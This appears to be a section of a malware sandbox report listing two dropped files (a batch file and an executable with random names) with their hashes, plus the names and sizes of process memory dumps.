Download Submit
C:\Users\Admin\Documents\Bqzazthpkhjgkygrz.bat
MD5
996c0a65e6b3332e0ae7233f45828afb

SHA1
3b4d9f7bb3d2ba83badd39e69fac2852808d6407

SHA256
05a5000a91b73c130b33fed9b9746a20522dab0e9c769064831a567e00fec694

SHA512
0888baee5736ccdaec9e974cbbbdae6c4a0fa7a6cab99b0973101c5d756b8b0880e6f6869fc17491c9c82af96443e3fecb31e3ae0e3c04968f5ce826ba7c33eb

Download Submit
\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
MD5
91679f42cd3ba051b5c7ce37d45b222c

SHA1
decc607894a299033ed3ede115a3bce51d21020b

SHA256
e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

SHA512
b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

Download Submit
memory/340-87-0x0000000000080000-0x00000000000A9000-memory.dmp

Filesize
164KB

Download
memory/340-86-0x0000000000E10000-0x0000000000E2C000-memory.dmp

Filesize
112KB

Download
memory/340-83-0x0000000000000000-mapping.dmp

Download
memory/340-88-0x0000000000B00000-0x0000000000E03000-memory.dmp

Filesize
3.0MB

Download
memory/340-89-0x0000000000900000-0x0000000000990000-memory.dmp

Filesize
576KB

Download
memory/668-54-0x000000002F501000-0x000000002F504000-memory.dmp

Filesize
12KB

Download
memory/668-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/668-55-0x0000000071C51000-0x0000000071C53000-memory.dmp

Filesize
8KB

Download
memory/1048-57-0x0000000000000000-mapping.dmp

Download
memory/1172-60-0x00000000765A1000-0x00000000765A3000-memory.dmp

Filesize
8KB

Download
memory/1172-61-0x00000000022D0000-0x0000000002F1A000-memory.dmp

Filesize
12.3MB

Download
memory/1172-59-0x0000000000000000-mapping.dmp

Download
memory/1316-70-0x0000000000C60000-0x0000000000CAB000-memory.dmp

Filesize
300KB

Download
memory/1316-69-0x0000000000410000-0x0000000000416000-memory.dmp

Filesize
24KB

Download
memory/1316-68-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/1316-66-0x0000000001040000-0x0000000001041000-memory.dmp

Filesize
4KB

Download
memory/1316-63-0x0000000000000000-mapping.dmp

Download
memory/1408-82-0x0000000008130000-0x0000000008260000-memory.dmp

Filesize
1.2MB

Download
memory/1408-79-0x0000000007FA0000-0x0000000008125000-memory.dmp

Filesize
1.5MB

Download
memory/1468-71-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1468-81-0x0000000000310000-0x0000000000321000-memory.dmp

Filesize
68KB

Download
memory/1468-80-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1468-78-0x0000000000210000-0x0000000000221000-memory.dmp

Filesize
68KB

Download
memory/1468-77-0x00000000008C0000-0x0000000000BC3000-memory.dmp

Filesize
3.0MB

Download
memory/1468-74-0x000000000041D450-mapping.dmp

Download
memory/1468-73-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1468-72-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1996-85-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads